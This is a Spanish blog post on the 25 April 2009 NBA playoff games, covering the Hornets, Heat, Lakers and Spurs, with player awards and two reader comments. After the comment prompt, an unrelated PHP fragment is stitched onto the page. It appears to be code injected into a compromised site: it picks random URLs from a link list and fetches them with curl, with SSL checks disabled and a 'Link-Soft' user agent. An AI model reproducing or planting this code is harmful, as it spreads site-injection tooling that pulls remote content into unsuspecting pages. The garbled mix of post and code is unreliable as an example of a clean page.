Playoffs (25/04/2009): The Killers

26 de April de 2009 por TheDeerHunter

Fuera bromas, los playoffs es el momento de echar el resto. Las grandes estrellas relucen más que nunca en este momento, cuando quien las tiene las utiliza hasta el abuso si es preciso.

De las extraordinarias actuaciones individuales de anoche, no sabríamos por donde empezar. Quien empleara el “saturday night” en cualquier otra cosa que no fuera disfrutar viendo a estos monstruos debería arrepentirse.

Llevamos días comentando el baño que se estaba llevando Chris Paul y de si Billups era aún mejor que él. No fue la noche del bueno de Chancey, quizás deslumbrado con tantas camisetas amarillas en las gradas. Apenas nos acordábamos del increíble ambiente del New Orleans Arena que no ha sido el fortín del año pasado. Anoche apretaron de lo lindo y, llevado en volandas, CP3 se dedicó a mostrar las diabluras que se le presuponen.

Por fin la defensa de Byron Scott dio muestras de una mínima eficacia que, además de detener la sangría del base de Denver, logró minimizar a Carmelo y JR Smith en la medida de lo posible y también secar a Nené, que tanto daño le está haciendo, aunque fuera a costa de un gran desgaste de sus hombres altos. Butler, Posey y Sean Marks lograron esta vez producir buenos números y, con todo, la victoria estuvo en manos de Carmelo que resolvió inusualmente mal. Todo vale y seguro que los Hornets apretarán más todavía para el próximo partido.

En Miami los Heat les devolvieron a los Hawks el palizón del primer partido. Empezamos a tener nuestras dudas de si están capacitados para ganar algún partido fuera de Atlanta. El año pasado no lo hicieron y anoche se les vio atenazadísimos desde el principio. Entre Bibby, Josh Smith, Joe Johnson y Flip Murray hicieron un espantoso 17 de 52 y Johnson se llevó la palma perdiendo él sólo 5 balones más. A todo esto su defensa fue la risa. Casi parece una broma que hace tan sólo un tiempo dijéramos que era el equipo mejor preparado para detener a Wade. Flash todavía se estará riendo de nuestra ocurrencia.

Dos eliminatorias quedaron vistas para sentencia. La más clara fue la de Lakers frente a Utah. Volvía Okur y Phill Jackson decidió implementar la solución Gasol-Odom que tan buenos resultados dio el año pasado. Los amarillos mostraron las ganas que no han mostrado hasta ahora y Kobe decidió terminar con esta farsa. La prueba palpable es que anotó todos los tiros que intentó sobre Brewer, su defensor habitual. Esto ya terminó de desintegrar la floja defensa de Utah que nada pudo hacer para revertir la situación. Deron&Boozer hicieron buenos números, pero sin la más mínima convicción. Nos extrañan los 7 minutos que participó Bynum. Intuición de Phil Jackson, según dijo él mismo.

Los Spurs están empezando a asumir que no van a poder con los Mavericks. Mason, Bonner, Hill… el factor X que les ha mantenido vivos durante la larga ausencia de Ginobili no está funcionando en absoluto. Al final Popovich tiene que tirar mano de Bruce, Finley y lo de siempre pero ya ni actuaciones superlativas de Parker y Duncan logran acercar a este equipo a la victoria. En cambio Dallas no necesita ni siquiera a un buen Nowitzki. Josh Howard se sobra y se basta. Veremos si definitivamente se ha recuperado a este jugador para la práctica competitiva del baloncesto. Grande Jason Kidd, por cierto.

PREMIOS

MVP: Se lo vamos a dar a los 3 jugadores que ayer lideraron a sus respectivos equipos a la victoria porque se nos hace muy difícil decidirnos. Kobe Bryant (38 puntos), Dwyane Wade (29 puntos, 7 rebotes y 8 asistencias) y Chris Paul (32 puntos y 12 asistencias). Tener una figura en tu equipo te facilita la vida en Playoffs.

Rookie: Si hablamos de un rookie en los Heat rápido pensaréis en Beasley… Pues no. En el partido de ayer fue Mario Chalmers acompañó perfectamente a Dwyane Wade con 15 puntos, 5 rebotes, 3 asistencias, 4 robos, 1 taón y ninguna pérdida.

Sorpresa: Hemos comentado muchas veces que para que los HEat tengan oportunidades de pasar de ronda, los compañeros de Wade deberían dar un paso al frente. Ayer lo dio y largo, Jermaine O’Neal con 22 puntos y 10 rebotes. Con ayuda, Wade tiene todas las de ganar.

Decepción: La supuesta figura de los Hawks, Joe Johnson, no estuvo ayer a la altura. 10 puntos, 5 pérdidas y la sensación de ser superado una y otra vez por Wade.

Mayor esfuerzo en vano: Claramente el de la pareja Parker-Duncan, demasiados solos ante los Mavs. El primero acabó el partido con 43 puntos, igualando, con 31, el récord de puntos en un partido de Playoffs de los Spurs. El segundo completó otra gran actuación: 25 puntos, 10 rebotes y 7 asistencias.

Comenta

2 comentarios a esta entrada

  1. Fran Reyes dice:
    #1

    A pesar de que durante el resto de partido fueron superiores, durante el primer cuarto los Lakers me dieron unas malas sensaciones terribles que aún me perduran. No sé, creo que hace falta algo más para aspirar a ganar la final de conferencia, ya no la de la NBA… Lo mejor fue ver a Kobe jugar para si mismo en ataque durante un ratito, y lo raro ver la caída brutal de Bynum en la rotación. Cosa, imagino, de la velocidad de la zona de Utah.

    Otra cosa: ¿qué ha sucedido con Adam Morrison y Sasha Vujacic? Han comentado algo vagamente durante la transmisión, pero me gustaría saber algo más. Lo positivo del caso es que gracias a esto DJ Mbenga pudo estar al menos en el banquillo 🙂 Junto a Farmar, el dúo de Lakers que no jugó ni un minuto

      Citar

  2. Josep Àngel Colomés dice:
    #2

    He cogido cariño a San Antonio, ayer era el cumple de Tim Duncan y no pudo vencer. Mala celebración pueden tener de los 10 años de su primer título.

    Josep Àngel Colomés

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>